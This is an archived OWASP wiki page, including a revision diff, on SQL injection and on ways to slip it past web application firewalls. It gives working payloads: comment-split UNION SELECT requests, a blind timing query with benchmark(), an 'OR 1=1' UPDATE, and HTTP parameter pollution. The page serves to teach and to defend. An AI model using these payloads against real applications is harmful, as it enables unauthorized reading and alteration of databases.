This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "SQL Injection Bypassing WAF"

From OWASP
Jump to: navigation, search
m (SQLi Bypass WAF.)
m (SQLi Bypass WAF.)
Line 8: Line 8:
 
<pre>
 
<pre>
 
• SQL Injection into a String/Char parameter
 
• SQL Injection into a String/Char parameter
Example: SELECT * from table where example = 'Example'
+
  Example: SELECT * from table where example = 'Example'
  
 
• SQL Injection into a Numeric parameter
 
• SQL Injection into a Numeric parameter
Example: SELECT * from table where id = 123
+
  Example: SELECT * from table where id = 123
 
</pre>
 
</pre>
  
Line 18: Line 18:
 
<pre>
 
<pre>
 
• A vulnerable request can get into Insert, Update, Delete, etc.
 
• A vulnerable request can get into Insert, Update, Delete, etc.
Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'
+
  Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'
 
</pre>
 
</pre>
  
 
# Blind SQL Injection
 
# Blind SQL Injection
 
<pre>
 
<pre>
Example:  
+
  Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))
select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))
 
 
</pre>
 
</pre>
  
 
# Exploitation features for various DBMSs
 
# Exploitation features for various DBMSs
 
<pre>
 
<pre>
Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3
+
  Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3
Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
+
  Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
 
</pre>
 
</pre>
  
 
'''Bypassing WAF: SQL Injection - Normalization Method'''
 
'''Bypassing WAF: SQL Injection - Normalization Method'''
 
<br><br>
 
<br><br>
Example Number (1) of a vulnerability in the function of request Normalization.
+
Example Number (1) of a vulnerability in the function of request Normalization.
 
<br>
 
<br>
 
• The following request doesn’t allow anyone to conduct an attack
 
• The following request doesn’t allow anyone to conduct an attack

Revision as of 16:37, 11 March 2016

This is an Attack. To view all attacks, please see the Attack Category page.

SQLi

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL Injection – Basic Concepts

There are two types of SQL Injection

• SQL Injection into a String/Char parameter
  Example: SELECT * from table where example = 'Example'

• SQL Injection into a Numeric parameter
  Example: SELECT * from table where id = 123
  1. Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions.
• A vulnerable request can get into Insert, Update, Delete, etc.
  Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'
  1. Blind SQL Injection
  Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))
  1. Exploitation features for various DBMSs
  Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3
  Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

Bypassing WAF: SQL Injection - Normalization Method

Example Number (1) of a vulnerability in the function of request Normalization.


• The following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request

 will be successfully performed
 /?id=1/*union*/union/*select*/select+1,2,3/*

• After being processed by WAF, the request will become

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.

Example Number (2) of a vulnerability in the function of request Normalization.
• Similarly, the following request doesn’t allow anyone to conduct an attack

 /?id=1+union+select+1,2,3/*

• If there is a corresponding vulnerability in the WAF, this request will be successfully performed

 /?id=1+un/**/ion+sel/**/ect+1,2,3--

• The SQL request will become

 SELECT * from table where id =1 union select 1,2,3--

Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####, %00).

The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string).

'Using HTTP Parameter Pollution (HPP)'

• The following request doesn’t allow anyone to conduct an attack

 /?id=1;select+1,2,3+from+users+where+id=1--

• This request will be successfully performed using HPP

 /?id=1;select+1&id=2,3+from+users+where+id=1--

Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.
OWASP EU09 Luca Carettoni, Stefano diPaola.


and More to Write.